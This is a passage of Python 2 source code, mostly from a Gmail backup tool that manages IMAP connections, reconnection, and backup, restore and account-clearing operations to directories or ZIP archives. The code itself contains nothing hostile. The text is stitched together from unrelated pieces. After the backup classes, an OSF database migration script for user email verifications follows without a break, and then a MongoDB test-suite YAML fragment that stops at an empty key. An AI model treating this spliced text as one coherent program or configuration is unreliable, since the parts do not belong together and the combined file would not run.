        'caj3_GM': ('[Google Mail]/&UWiQ6JD1TvY-', '[Google Mail]/&V4NXPmh2-'),
        'caj4_GM': ('[Google Mail]/&YkBnCZCuTvY-', '[Google Mail]/&XfJSIJZkkK5O9g-'),
        'caj5_GM': ('[Google Mail]/&MFkweTBmMG4w4TD8MOs-', '[Google Mail]/&MLQw33ux-'),
        'caj6_GM': ('[Google Mail]/&yATMtLz0rQDVaA-', '[Google Mail]/&1zTJwNG1-'),
    }
    def __init__(self, username, password, notifier, lang=None):
        # Credentials are kept so reconnect() can log in again after a drop.
        self.username = username
        self.password = password
        self.notifier = notifier
        self.lang = None
        if lang is not None:
            self.setLanguage(lang)
        # State replayed by reconnect(): last selected mailbox, last search
        # criteria, and a one-entry cache of the last fetched message.
        self._lastMailbox = None
        self._lastSearch = None
        self._lastFetched = None
        self._lastFetchedMsg = None
        self._wasLogged = False
    def recoverableError(self, e):
        # Decide whether `e` is a transient failure worth a reconnect.
        # 'Invalid credentials' is only transient after a successful login
        # (Gmail sometimes rejects a re-login right after a disconnect).
        if isinstance(e, (socket.error, imaplib.IMAP4_SSL.abort, socket.timeout)):
            return True
        elif isinstance(e, imaplib.IMAP4_SSL.error):
            str_e = str(e)
            if self._wasLogged and 'Invalid credentials' in str_e:
                return True
        return False
    def guessLanguage(self):
        '''Guess the account language from the mailboxes LIST reports.

        Prefers a language whose all-mail AND trash names both exist;
        falls back to one with just the all-mail name.  Raises ValueError
        when no known mailbox layout matches.
        '''
        present = set()
        status, ret = self.con.list()
        for i in ret:
            # Pull the quoted mailbox name out of each LIST response line,
            # keeping only the special '[Gmail]...'-style mailboxes.
            match = re.match(r'^\(.*\)\s".*"\s"(\[.*\].*)"\s*$', i)
            if not match:
                continue
            box = match.group(1)
            present.add(box)
        for key, (all_mail, trash) in self.MAILBOX_NAMES.iteritems():
            if all_mail in present and trash in present:
                return key
        for key, (all_mail, trash) in self.MAILBOX_NAMES.iteritems():
            if all_mail in present:
                self.notifier.nLog("Guessing language with internal code '%s', in case of problems contact us at honza.svec@gmail.com" % key)
                return key
        self.notifier.nError(\
'''Your Gmail account doesn't export some IMAP needed to Gmail Backup work.
Possible causes are:
- You are using the Gmail Labs.
Please go to the Settings/Label page and enable the IMAP access into
All Mails and Trash folders.
- You are using unsupported language of Gmail. Please run the following
command:
gmail-backup.exe list <your_address@gmail.com> <your_password>
and send the output of this command to our user support group:
gmail-backup-com-users@googlegroups.com
Thank you''')
        raise ValueError("Cannot access IMAP folders")
    def setLanguage(self, lang):
        # Resolve the special mailbox names for the given internal code.
        # Raises KeyError for an unknown code.
        self.lang = lang
        self.ALL_MAILS = self.MAILBOX_NAMES[lang][0]
        self.TRASH = self.MAILBOX_NAMES[lang][1]
    def connect(self, noguess=False):
        '''Open the SSL connection, log in, and detect the language
        (unless it is already known or `noguess` is set).'''
        self.con = MyIMAP4_SSL('imap.gmail.com', 993)
        self.con.setNotifier(self.notifier)
        self.con.login(self.username, self.password)
        self._wasLogged = True
        if self.lang is None and not noguess:
            lang = self.guessLanguage()
            self.setLanguage(lang)
    def close(self):
        # Drop the socket without the IMAP LOGOUT handshake.
        self.con.shutdown()
        del self.con
    def select(self, mailbox):
        # Remember the mailbox so reconnect() can re-select it.
        self._lastMailbox = mailbox
        self._call(self.con.select, mailbox)
    def reconnect(self):
        '''Re-establish the connection with exponential backoff.

        Replays the last select() and search() so callers can continue
        where they left off.  Returns True on success, False after
        MAX_TRY failed attempts.
        '''
        TRY = 1
        sleep = SLEEP_FOR
        while TRY <= MAX_TRY:
            self.notifier.nLog(_("Trying to reconnect (%d)") % TRY)
            try:
                self.connect()
                if self._lastMailbox:
                    self.select(self._lastMailbox)
                if self._lastSearch:
                    self.search(self._lastSearch)
                self.notifier.nLog(_("Reconnected!"))
                return True
            except:
                e = sys.exc_info()[1]
                if self.recoverableError(e):
                    self.notifier.nLog(_("Not connected, sleeping for %d seconds") % SLEEP_FOR)
                    time.sleep(sleep)
                    sleep *= 2  # exponential backoff between attempts
                    TRY += 1
                else:
                    raise e
        self.notifier.nLog(_("Unable to reconnect"))
        return False
    def fetchMessageId(self, num):
        '''Return a stable identifier for message `num`.

        Uses the Message-ID header when present; otherwise downloads the
        whole message and derives a synthetic id from its content.
        '''
        typ, data = self._call(self.con.fetch, num, '(BODY.PEEK[HEADER.FIELDS (Message-ID)])')
        if data is None or data[0] is None:
            match = None
        else:
            match = re.match(r'^.*:\s*<(.*)>$', data[0][1].strip())
        if match:
            # The message has Message-ID stored in it
            imsg_id = match.group(1)
            imsg_id = _onlyAscii(imsg_id)
            return imsg_id
        else:
            # We compute our synthetic Message-ID from the whole message
            mail = self.fetchMessage(num)
            msg = email.message_from_string(mail)
            imsg_id = _parseMsgId(msg)
            return imsg_id
    def fetchMessage(self, num):
        # Download the full raw message, with a one-entry cache so that
        # fetchMessageId()'s fallback does not fetch the same mail twice.
        if self._lastFetched == num:
            return self._lastFetchedMsg
        else:
            typ, data = self._call(self.con.fetch, num, '(BODY.PEEK[])')
            mail = data[0][1]
            self._lastFetched = num
            self._lastFetchedMsg = mail
            return mail
    def search(self, where):
        # `where` is a list of IMAP SEARCH criteria; remembered so that
        # reconnect() can replay it.  Returns the list of message numbers.
        self._lastSearch = where
        typ, numbers = self._call(self.con.search, None, *where)
        numbers = numbers[0].split()
        return numbers
    def lsub(self):
        # LSUB with IMAP string escapes undone.
        status, ret = self._call(self.con.lsub)
        ret = [imap_unescape(i) for i in ret]
        return ret
    def list(self):
        # LIST with IMAP string escapes undone.
        status, ret = self._call(self.con.list)
        ret = [imap_unescape(i) for i in ret]
        return ret
    def create(self, label):
        self._call(self.con.create, label)
    def copy(self, message_set, label):
        self._call(self.con.copy, message_set, label)
    def append(self, mailbox, flags, msg_date, msg):
        self._call(self.con.append, mailbox, flags, msg_date, msg)
    def store(self, nums, state, flags):
        self._call(self.con.store, nums, state, flags)
    def expunge(self):
        self._call(self.con.expunge)
    def delete(self, mailbox):
        self._call(self.con.delete, mailbox)
    def _call(self, method, *args, **kwargs):
        '''Invoke a bound method of self.con, reconnecting on failure.

        After a reconnect self.con is a brand-new object, so the method is
        looked up again by name on the current connection instead of using
        the stale bound method that was passed in.
        '''
        # Dirty hack:
        # im_func is the Python-2 name for the underlying function of a
        # bound method; only its __name__ is used for the re-lookup.
        method_name = method.im_func.__name__
        while True:
            try:
                method = getattr(self.con, method_name)
                ret = method(*args, **kwargs)
                return ret
            except:
                e = sys.exc_info()[1]
                if self.recoverableError(e):
                    self.notifier.nLog(_("Network error occured, disconnected"))
                    if not self.reconnect():
                        raise e
                else:
                    raise e
class EmailStorage(object):
    '''Abstract interface of a local e-mail backup store.

    Concrete implementations are DirectoryStorage (a tree of *.eml files)
    and ZipStorage (a single ZIP archive).  The methods below that carry
    only a docstring are documentation stubs: they implicitly return None
    and are expected to be overridden by subclasses.
    '''
    @classmethod
    def createStorage(cls, fn, notifier):
        # Factory: the part of `fn` before an optional '#fragment' (a file
        # naming template) selects the backend -- *.zip -> ZipStorage,
        # anything else -> DirectoryStorage.
        ext = os.path.splitext(fn.split('#')[0])[1]
        if ext.lower() == '.zip':
            return ZipStorage(fn, notifier)
        else:
            return DirectoryStorage(fn, notifier)
    def idsOfMessages(self):
        '''Returns the set of stored msg_ids'''
    def iterBackups(self, since_time=None, before_time=None, logging=True):
        '''Iterates over backups specified by parameters and yields pairs (storageid, message)'''
    def store(self, msg):
        '''Stores message `msg`'''
    def getLabelAssignment(self):
        '''Returns label assignment'''
    def updateLabelAssignment(self, assignment):
        '''Updates label assignment with `assignment`'''
    def lastStamp(self):
        '''Return the stamp of the last backup, the output is in the format of _convertTime()'''
    def updateStamp(self, last_time):
        '''Updates the stamp of the last backup to last_time'''
    def _templateDict(self, msg):
        '''Creates dictionary used in the template expansion

        Returns date parts (YEAR..SECOND), sender and subject of `msg`,
        with '/' replaced by '_' in every value so the expanded template
        cannot escape into parent directories.
        '''
        d = _parseMsgDate(msg)
        ret = {}
        ret['YEAR'] = time.strftime('%Y', d)
        ret['MONTH'] = time.strftime('%m', d)
        ret['DAY'] = time.strftime('%d', d)
        ret['HOUR'] = time.strftime('%H', d)
        ret['MINUTE'] = time.strftime('%M', d)
        ret['SECOND'] = time.strftime('%S', d)
        ret['FROM'], ret['SUBJ'] = _getMsgInitials(msg)
        ret['FROM'] = ret['FROM'].lower()
        ret = dict((k, v.replace('/', '_')) for (k, v) in ret.iteritems())
        return ret
class DirectoryStorage(EmailStorage):
    '''Backup store keeping every message as a *.eml file in a directory tree.

    Layout inside self.fn:
      <template-expanded path>-N.eml  -- the messages themselves
      ids.txt                         -- cache: filename <-> message id
      labels.txt                      -- label assignment per filename
      stamp                           -- date of the newest backed-up mail
    '''
    def __init__(self, fn, notifier):
        self.setFnAndFragment(fn)
        self.notifier = notifier
        self._makeMaildir()
        self._readDownloadedIds()
        self._readLabelAssignment()
    def setFnAndFragment(self, fn):
        '''Sets the filename and the pattern for naming the files in the
        storage

        `fn` may be "directory#template"; without a template a default
        date/sender/subject based layout is used.
        '''
        items = fn.split("#", 1)
        if len(items) == 1:
            self.fn = items[0]
            self.fragment = '${YEAR}/${MONTH}/${YEAR}${MONTH}${DAY}-${HOUR}${MINUTE}${SECOND}-${FROM}-${SUBJ}'
        else:
            self.fn = items[0]
            self.fragment = items[1]
        self.fn = os.path.expanduser(self.fn)
        self.fragment = string.Template(self.fragment)
    def iterBackups(self, since_time=None, before_time=None, logging=True):
        # Yields (relative filename, raw message) for every stored *.eml
        # whose date falls inside the optional (since_time, before_time)
        # window; both bounds are numeric timestamps (time.mktime format).
        def walkBackups(top):
            '''Walks trough the dn and returns path originating in dn and ending with '.eml'
            '''
            for dn, sub_dns, fns in os.walk(top):
                rel_dn = dn[len(top):].lstrip(os.path.sep)
                for fn in fns:
                    if os.path.splitext(fn)[1].lower() != '.eml':
                        continue
                    yield os.path.join(rel_dn, fn)
        listing = sorted(walkBackups(self.fn))
        for idx, msg_fn in enumerate(listing):
            try:
                full_msg_fn = os.path.join(self.fn, msg_fn)
                fr = file(full_msg_fn, 'rb')
                try:
                    msg = fr.read()
                finally:
                    fr.close()
                msg_date2 = _getMailDate(msg)
                msg_date2_num = time.mktime(msg_date2)
                if (since_time is None or since_time < msg_date2_num) \
                        and (before_time is None or msg_date2_num < before_time):
                    yield msg_fn, msg
                    if logging:
                        from_address, subject = _getMailInitials(msg)
                        self.notifier.nEmailRestore(from_address, subject, idx+1, len(listing))
                else:
                    if logging:
                        from_address, subject = _getMailInitials(msg)
                        self.notifier.nEmailRestoreSkip(from_address, subject, idx+1, len(listing))
            except:
                # A bare except also traps GeneratorExit (old-style
                # generator close); that must end the loop, everything
                # else is reported and the iteration continues.
                if isinstance(sys.exc_info()[1], GeneratorExit):
                    break
                self.notifier.handleError(_("Error occured while reading e-mail from disc"))
    def _makeMaildir(self):
        # Create a maildir-like skeleton; existing directories are fine.
        dirs = [self.fn, os.path.join(self.fn, 'cur'), os.path.join(self.fn, 'new'), os.path.join(self.fn, 'tmp')]
        try:
            for i in dirs:
                os.makedirs(i)
        except OSError:
            pass
    def idsFilename(self):
        return os.path.join(self.fn, 'ids.txt')
    def labelFilename(self):
        return os.path.join(self.fn, 'labels.txt')
    def stampFile(self):
        return os.path.join(self.fn, 'stamp')
    def _readDownloadedIds(self):
        # Build self.message_iid2fn (message id -> relative filename).
        # Uses the ids.txt cache when present; otherwise rescans every
        # stored message, which can be slow for large backups.
        cache = self.idsFilename()
        self.message_iid2fn = {}
        if not os.path.isfile(cache):
            for msg_fn, msg in self.iterBackups(logging=False):
                try:
                    msg_iid = _getMailInternalId(msg)
                    self.message_iid2fn[msg_iid] = msg_fn
                except:
                    self.notifier.handleError(_("Error while reading MessageID from stored message"))
        else:
            fr = file(cache, 'r')
            for line in fr:
                try:
                    items = line.strip().split(None, 1)
                    try:
                        msg_fn = items[0]
                        msg_iid = items[1]
                        self.message_iid2fn[msg_iid] = msg_fn
                    except IndexError:
                        # Malformed (too short) cache lines are skipped.
                        pass
                except:
                    self.notifier.handleError(_("Bad line in file with cached MessageIDs"))
            fr.close()
        # Reverse mapping: relative filename -> message id.
        self.message_fn2iid = _revertDict(self.message_iid2fn)
    def _writeDownloadedIds(self):
        # Rewrite ids.txt from scratch, sorted by filename.
        fn = self.idsFilename()
        if os.path.exists(fn):
            os.remove(fn)
        fw = file(fn, 'w')
        for msg_iid, msg_fn in sorted(self.message_iid2fn.items(), key=lambda item: item[1]):
            try:
                line = '%s\t%s' % (msg_fn, msg_iid)
                print >> fw, line
            except:
                self.notifier.nError(_("Errorneous message in file: %s, please report it to <honza.svec@gmail.com>") % msg_fn)
        fw.close()
    def idsOfMessages(self):
        return set(self.message_iid2fn)
    def getLabelAssignment(self):
        return self.message_iid2labels.copy()
    def updateLabelAssignment(self, assignment):
        self.message_iid2labels.update(assignment)
        self._writeLabelAssignment()
    def _cleanFilename(self, fn):
        '''Cleans the filename - removes diacritics and other filesystem special characters
        '''
        fn = _removeDiacritics(fn)
        fn = fn.encode('utf-8', 'replace')
        # Whitelist of characters safe on the current filesystem; note that
        # both '/' and '\\' are kept because `fn` is a whole relative path.
        if os.name == 'posix':
            good_chars = set('!"#\'()+-0123456789:;<=>@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]_abcdefghijklmnopqrstuvwxyz{}/\\')
        elif os.name == 'nt':
            good_chars = set("!#'()+-0123456789;=@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]_abcdefghijklmnopqrstuvwxyz{}/\\")
        else:
            good_chars = set("+-0123456789=@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz/\\")
        ret = ''
        for c in fn:
            if c not in good_chars:
                c = '_'
            ret += c
        ret = re.sub('_+', '_', ret)
        # Keep well under common 255-char path-component limits.
        ret = ret[:240]
        return ret
    def getMailFilename(self, mail):
        # Expand the naming template for this message and sanitize it.
        msg = email.message_from_string(mail)
        values = self._templateDict(msg)
        fn = self.fragment.safe_substitute(values)
        fn = self._cleanFilename(fn)
        return fn
    def store(self, msg):
        # Write `msg` under a template-derived name, appending '-N.eml'
        # with the first N that does not collide with an existing file.
        msg_fn = self.getMailFilename(msg)
        msg_dn = os.path.dirname(msg_fn)
        full_dn = os.path.join(self.fn, msg_dn)
        if not os.path.isdir(full_dn):
            os.makedirs(full_dn)
        msg_iid = _getMailInternalId(msg)
        idx = 1
        while True:
            msg_fn_num = '%s-%01d.eml'%(msg_fn, idx)
            idx += 1
            full_fn_num = os.path.join(self.fn, msg_fn_num)
            if not os.path.exists(full_fn_num):
                break
        self.message_iid2fn[msg_iid] = msg_fn_num
        self.message_fn2iid[msg_fn_num] = msg_iid
        fw = file(full_fn_num, 'wb')
        try:
            fw.write(msg)
        finally:
            fw.close()
    def storeComplete(self):
        # Called once after a backup run to persist the id cache.
        self._writeDownloadedIds()
    def _backupLabelAssignment(self):
        # Keep one previous generation of labels.txt as labels.txt.bak.
        assign_fn = self.labelFilename()
        assign_fn_old = self.labelFilename()+'.bak'
        if os.path.exists(assign_fn):
            if os.path.exists(assign_fn_old):
                os.remove(assign_fn_old)
            shutil.copy(assign_fn, assign_fn_old)
    def _escapeLabels(self, labels):
        # Serialize a label list to one whitespace-separated field; spaces
        # and tabs inside a label are backslash-escaped.
        utf8_labels = [imap_decode(s) for s in labels]
        return ' '.join(s.replace('\t', '\\\t').replace(' ', '\\ ') for s in utf8_labels)
    def _unescapeLabels(self, string):
        # Inverse of _escapeLabels(): rejoin tokens whose predecessor ended
        # with a backslash (an escaped space), then re-encode for IMAP.
        lst = string.split()
        ret = []
        for i in lst:
            if ret and ret[-1][-1] == '\\':
                ret[-1] = ret[-1][:-1]+' '+i
            else:
                ret.append(i)
        ret = [imap_encode(s) for s in ret]
        return ret
    def _readLabelAssignment(self):
        # Load labels.txt into self.message_iid2labels; lines referring to
        # files we do not know about are silently dropped.
        fn = self.labelFilename()
        self.message_iid2labels = {}
        if os.path.isfile(fn):
            fr = codecs.open(fn, 'r', 'utf-8')
            for line in fr:
                items = line.split(None, 1)
                msg_fn = items[0]
                msg_iid = self.message_fn2iid.get(msg_fn, None)
                if msg_iid is not None:
                    self.message_iid2labels[msg_iid] = self._unescapeLabels(items[1])
            fr.close()
    def _writeLabelAssignment(self):
        # Rewrite labels.txt (after saving a .bak copy of the old one).
        self._backupLabelAssignment()
        fn = self.labelFilename()
        if os.path.exists(fn):
            os.remove(fn)
        fw = codecs.open(fn, 'w', 'utf-8')
        for msg_iid, labels in sorted(self.message_iid2labels.items()):
            msg_fn = self.message_iid2fn.get(msg_iid)
            if msg_fn is None:
                # We are unable do determine the filename for msg_iid
                continue
            print >> fw, '%s\t%s' % (msg_fn, self._escapeLabels(labels))
        fw.close()
    def lastStamp(self):
        # Read the date of the newest backed-up message; None when there
        # is no stamp file yet.  Returns a time.struct_time.
        stampFile = self.stampFile()
        try:
            fr = file(stampFile, 'r')
            for line in fr:
                last_time = line.strip()
                break
            fr.close()
        except IOError:
            last_time = None
        if last_time is not None:
            last_time = time.strptime(last_time, '%Y%m%d')
        return last_time
    def updateStamp(self, last_time):
        # Persist the date (struct_time) of the newest backed-up message.
        if last_time is None:
            return
        last_time = time.strftime('%Y%m%d', last_time)
        stampFile = self.stampFile()
        if os.path.exists(stampFile):
            os.remove(stampFile)
        fw = file(stampFile, 'w')
        print >> fw, last_time
        fw.close()
class ZipStorage(DirectoryStorage):
    '''Backup store keeping all messages inside one ZIP archive.

    Reuses DirectoryStorage's id/label/stamp bookkeeping, but the side
    files live next to the archive (<name>.ids.txt, <name>.labels.txt,
    <name>.stamp.txt) and messages are ZIP members instead of files.
    '''
    def __init__(self, fn, notifier):
        self.setFnAndFragment(fn)
        self.notifier = notifier
        self._openZipFile()
        self._readDownloadedIds()
        self._readLabelAssignment()
    def setFnAndFragment(self, fn):
        # After the parent parsed "file#template", self.zip_fn is the
        # archive path and self.fn its containing directory (used by the
        # inherited bookkeeping helpers).
        super(ZipStorage, self).setFnAndFragment(fn)
        self.zip_fn = self.fn
        self.fn = os.path.dirname(self.fn)
    def _openZipFile(self):
        # Despite the name this only makes sure the target directory
        # exists; the archive itself is opened lazily in store()/iterBackups().
        try:
            os.makedirs(self.fn)
        except OSError:
            pass
    def idsFilename(self):
        fn = os.path.splitext(self.zip_fn)[0] + '.ids.txt'
        return fn
    def labelFilename(self):
        fn = os.path.splitext(self.zip_fn)[0] + '.labels.txt'
        return fn
    def stampFile(self):
        fn = os.path.splitext(self.zip_fn)[0] + '.stamp.txt'
        return fn
    def iterBackups(self, since_time=None, before_time=None, logging=True):
        # Same contract as DirectoryStorage.iterBackups(), reading the
        # messages out of the ZIP archive instead of the filesystem.
        if os.path.exists(self.zip_fn):
            zip = zipfile.ZipFile(self.zip_fn, 'r')
            listing = [i.filename for i in zip.infolist()]
            # skip labels.txt and labels.txt.bak files
            for idx, msg_fn in enumerate(listing):
                try:
                    msg = zip.read(msg_fn)
                    msg_date2 = _getMailDate(msg)
                    msg_date2_num = time.mktime(msg_date2)
                    if (since_time is None or since_time < msg_date2_num) \
                            and (before_time is None or msg_date2_num < before_time):
                        yield msg_fn, msg
                        if logging:
                            from_address, subject = _getMailInitials(msg)
                            self.notifier.nEmailRestore(from_address, subject, idx+1, len(listing))
                    else:
                        if logging:
                            from_address, subject = _getMailInitials(msg)
                            self.notifier.nEmailRestoreSkip(from_address, subject, idx+1, len(listing))
                except:
                    # GeneratorExit (generator closed) ends the loop; any
                    # other error is reported and iteration continues.
                    if isinstance(sys.exc_info()[1], GeneratorExit):
                        break
                    self.notifier.handleError(_("Error occured while reading e-mail from disc"))
    def store(self, msg):
        # Append `msg` as a new deflated archive member, picking the first
        # '-N.eml' suffix that is not already present in the archive.
        if not os.path.exists(self.zip_fn):
            zip = zipfile.ZipFile(self.zip_fn, 'w', zipfile.ZIP_DEFLATED)
        else:
            zip = zipfile.ZipFile(self.zip_fn, 'a', zipfile.ZIP_DEFLATED)
        listing = zip.namelist()
        msg_fn = self.getMailFilename(msg)
        msg_iid = _getMailInternalId(msg)
        idx = 1
        while True:
            msg_fn_num = '%s-%01d.eml'%(msg_fn, idx)
            idx += 1
            if not msg_fn_num in listing:
                break
        self.message_iid2fn[msg_iid] = msg_fn_num
        self.message_fn2iid[msg_fn_num] = msg_iid
        zip.writestr(msg_fn_num, msg)
        zip.close()
class GMailBackup(object):
    '''High-level backup/restore/clear operations on one Gmail account.

    Glues a GMailConnection (IMAP side) to an EmailStorage (local side)
    and reports progress through the given notifier.
    '''
    def __init__(self, username, password, notifier, lang=None):
        self.notifier = notifier
        self.username = username
        self.password = password
        self.connection = GMailConnection(username, password, notifier, lang)
    def iterMails(self, where, skip=[]):
        '''Yield raw messages from All Mail matching the `where` criteria.

        Messages whose id is in `skip` (already downloaded) are not
        fetched.  NOTE: the default [] for `skip` is never mutated here,
        so the shared-mutable-default pitfall does not apply.
        '''
        self.connection.select(self.connection.ALL_MAILS)
        numbers = self.connection.search(where)
        skipped = 0
        for idx, num in enumerate(numbers):
            try:
                imsg_id = self.connection.fetchMessageId(num)
                if imsg_id in skip:
                    skipped += 1
                    self.notifier.nEmailBackupSkip(idx+1, len(numbers), skipped, len(skip))
                    continue
                msg = self.connection.fetchMessage(num)
                yield msg
                from_address, subject = _getMailInitials(msg)
                self.notifier.nEmailBackup(from_address, subject, idx+1, len(numbers))
            except:
                # GeneratorExit ends the loop; other errors are reported
                # (fatal ones re-raised by handleError) and we continue.
                if isinstance(sys.exc_info()[1], GeneratorExit):
                    break
                self.notifier.handleError(_("Error occured while downloading e-mail"))
        self.connection.close()
    def getLabels(self):
        '''Return the user-defined labels (leaf mailboxes) plus INBOX.'''
        ret = self.connection.list()
        labels = []
        for i in ret:
            match = re.match(r'^(\(.*\))\s".*?"\s"(.*)"\s*$', i)
            flags = match.group(1)
            # Only leaf mailboxes correspond to assignable labels.
            if '\\HasNoChildren' not in flags:
                continue
            label = match.group(2)
            # Skip Gmail's special '[Gmail]/...' mailboxes.
            if not re.match(r'^\[.*\].*$', label) and label != 'INBOX':
                labels.append(label)
        labels.append('INBOX')
        return labels
    def msgsWithLabel(self, label, where=['ALL']):
        '''Yield the message ids carrying `label`, retrying flaky searches.'''
        self.connection.select(label)
        retries = 0
        while True:
            try:
                numbers = self.connection.search(where)
                break
            except imaplib.IMAP4.error:
                retries += 1
                if retries > MAX_LABEL_RETRIES:
                    self.notifier.nError(_("Cannot backup the assignment of label: %s") % label)
                    raise StopIteration
                else:
                    # Re-select and try the search again.
                    self.connection.select(label)
        for num in numbers:
            yield self.connection.fetchMessageId(num)
    def labelAssignment(self, where=['ALL']):
        '''Return {message id: set of labels} for all matching messages.'''
        assignment = {}
        self.connection.connect()
        for i in self.getLabels():
            try:
                for msg in self.msgsWithLabel(i, where):
                    if msg not in assignment:
                        assignment[msg] = set()
                    assignment[msg].add(i)
            except:
                self.notifier.handleError(_("Error while doing backup of label %r") % i)
        return assignment
    def backup(self, fn, where=['ALL'], stamp=False):
        '''Back up matching messages (and label assignment) into storage `fn`.

        With stamp=True the search is narrowed to messages SINCE the date
        remembered from the previous run, and the stamp is advanced at the
        end.
        '''
        storage = EmailStorage.createStorage(fn, self.notifier)
        last_time = storage.lastStamp()
        # BUGFIX: `since` used to be computed only when last_time was set,
        # but was then used unconditionally under `if stamp:`, raising
        # NameError on a first stamped run.  Only narrow the search when a
        # previous stamp actually exists.
        if stamp and last_time is not None:
            since = _convertTime(time.strftime('%Y%m%d', last_time))
            try:
                idx = where.index('SINCE')
                where[idx+1] = since
            except ValueError:
                where.append('SINCE')
                where.append(since)
        self.notifier.nVersion()
        self.notifier.nBackup(False, self.username, fn)
        self.connection.connect()
        downloaded = storage.idsOfMessages()
        try:
            for msg in self.iterMails(where, downloaded):
                try:
                    storage.store(msg)
                    msg_date = _getMailDate(msg)
                    # Check for None first; comparing a date against None
                    # only worked by accident in Python 2.
                    if last_time is None or msg_date > last_time:
                        last_time = msg_date
                except:
                    self.notifier.handleError(_("Error while saving e-mail"))
        finally:
            # Always persist the id cache, even on abort.
            storage.storeComplete()
        self.notifier.nLabelsBackup(False)
        assignment = self.labelAssignment(where)
        storage.updateLabelAssignment(assignment)
        self.notifier.nLabelsBackup(True)
        storage.updateStamp(last_time)
        self.notifier.nBackup(True, self.username, fn)
    def restoreLabels(self, assignment, min_date, max_date):
        '''Re-apply the stored label `assignment` to restored messages.

        Only messages in the (min_date, max_date) window are scanned; the
        labels are recreated and the messages copied into them.
        '''
        self.connection.select(self.connection.ALL_MAILS)
        where = []
        where.append('SINCE')
        where.append(min_date)
        where.append('BEFORE')
        where.append(max_date)
        numbers = self.connection.search(where)
        message_by_labels = {}
        labels = set()
        for idx, num in enumerate(numbers):
            try:
                imsg_id = self.connection.fetchMessageId(num)
                if imsg_id in assignment:
                    for label in assignment[imsg_id]:
                        if label not in message_by_labels:
                            message_by_labels[label] = []
                        message_by_labels[label].append(num)
                        labels.add(label)
                self.notifier.nLabelsRestore(idx+1, len(numbers))
            except:
                self.notifier.handleError(_("Error while getting MessageID"))
        for label in labels:
            try:
                message_set = message_by_labels[label]
                message_set = ','.join(message_set)
                self.connection.create(label)
                self.connection.copy(message_set, label)
            except:
                self.notifier.handleError(_("Error while restoring label %r") % label)
    def restore(self, fn, since_time=None, before_time=None):
        '''Upload messages from storage `fn` back into the account.'''
        if since_time:
            since_time = _convertTimeToNum(since_time)
        if before_time:
            before_time = _convertTimeToNum(before_time)
        self.notifier.nVersion()
        self.notifier.nRestore(False, self.username, fn)
        self.connection.connect()
        storage = EmailStorage.createStorage(fn, self.notifier)
        dates = set()
        for msg_fn, msg in storage.iterBackups(since_time, before_time):
            try:
                msg_date = _getMailIMAPDate(msg)
                msg_date2 = _getMailDate(msg)
                msg_iid = _getMailInternalId(msg)
                self.connection.append(self.connection.ALL_MAILS, "(\Seen)", msg_date, msg)
                dates.add(msg_date2)
            except:
                self.notifier.handleError(_("Error while restoring e-mail"))
        if dates:
            # Widen the window slightly so boundary messages are included.
            min_date, max_date = _shiftDates(min(dates), max(dates))
            min_date = imaplib.Time2Internaldate(min_date)
            max_date = imaplib.Time2Internaldate(max_date)
            assignment = storage.getLabelAssignment()
            self.restoreLabels(assignment, min_date, max_date)
        self.notifier.nRestore(True, self.username, fn)
    def clear(self):
        '''Delete every message and label from the account.'''
        self.notifier.nVersion()
        self.notifier.nClear(False, self.username)
        self.connection.connect()
        self.connection.select(self.connection.ALL_MAILS)
        data = self.connection.search(['ALL'])
        nums = ','.join(data)
        if nums:
            self.connection.copy(nums, self.connection.TRASH)
            self.connection.store(nums, 'FLAGS.SILENT', '\\Deleted')
            self.connection.expunge()
        self.connection.select(self.connection.TRASH)
        data = self.connection.search(['ALL'])
        # BUGFIX: the old code tested the stale `nums` from the All-Mail
        # pass before recomputing it, so a non-empty Trash was skipped
        # when All Mail was empty (and vice versa an empty Trash triggered
        # a STORE with an empty message set).
        nums = ','.join(data)
        if nums:
            self.connection.store(nums, 'FLAGS.SILENT', '\\Deleted')
            self.connection.expunge()
        for label in self.getLabels():
            self.connection.delete(label)
        self.connection.close()
        self.notifier.nClear(True, self.username)
    def list(self):
        '''Yield (mailbox, message count) for every mailbox; -1 on error.'''
        self.connection.connect(noguess=True)
        ret = self.connection.list()
        for i in ret:
            match = re.match(r'^\(.*\)\s".*"\s"(.*)"\s*$', i)
            box = match.groups(1)[0]
            self.connection.select(box)
            try:
                data = self.connection.search(['ALL'])
                num = len(data)
            except imaplib.IMAP4.error:
                num = -1
            yield box, num
    def isNewVersion(self):
        '''Check the download page for a newer revision.

        Returns (revision, url) when one exists, (None, None) otherwise;
        all network/parse errors are swallowed.
        '''
        try:
            fr = urllib.urlopen(VERSION_URL)
            try:
                data = fr.read()
                url = 'http://code.google.com/p/gmail-backup-com/downloads/list'
                version_match = re.search('<td class="id"><a href=".*?">r(\d+)</a></td>', data)
                if version_match:
                    try:
                        new_revision = int(version_match.group(1))
                        if new_revision > int(GMB_REVISION):
                            return new_revision, url
                    except ValueError:
                        pass
                return None, None
            finally:
                fr.close()
        except:
            return None, None
    def reportNewVersion(self):
        '''Log whether a newer version is available; return its revision.'''
        version, url = self.isNewVersion()
        if version:
            msg = _('New version of GMail Backup is available!\nYou can download version %s here:\n%s') % (version, url)
        else:
            msg = _("You are using the latest version of GMail Backup.")
        self.notifier.nLog(msg)
        return version
# -*- coding: utf-8 -*-
"""Migrate users whose email_verifications=None to have
email_verifications={} (which is now the default value).
"""
import sys
import logging
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.models import User
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def do_migration():
    """Give every user whose email_verifications is None the new default {}."""
    targets = User.find(Q('email_verifications', 'eq', None))
    count = 0
    for user in targets:
        logger.info('Setting email_verifications for user {} to {{}}'.format(user._id))
        user.email_verifications = {}
        user.save()
        count += 1
    logger.info('Migrated {} users'.format(count))
def main(dry=True):
    """Run the migration inside a single transaction.

    With dry=True the transaction is aborted at the end by raising, so the
    migration's effects are rolled back (a dry run).
    """
    init_app(set_backends=True, routes=False)
    with TokuTransaction():
        do_migration()
        if dry:
            # Raising inside the context manager rolls everything back.
            raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
    # Pass --dry to preview the migration without committing; real runs
    # additionally log to a file.
    dry = '--dry' in sys.argv
    if not dry:
        script_utils.add_file_logger(logger, __file__)
    main(dry=dry)
base_suite: sharded_collections_jscore_passthrough_base
description: >-
  This suite runs through all fuzzer-generated tests and ensures that the 'queryShapeHash'
  attribute returned in explain is the same across multiple explain invocations, on all nodes of
  two sharded clusters running different binary versions.
overrides:
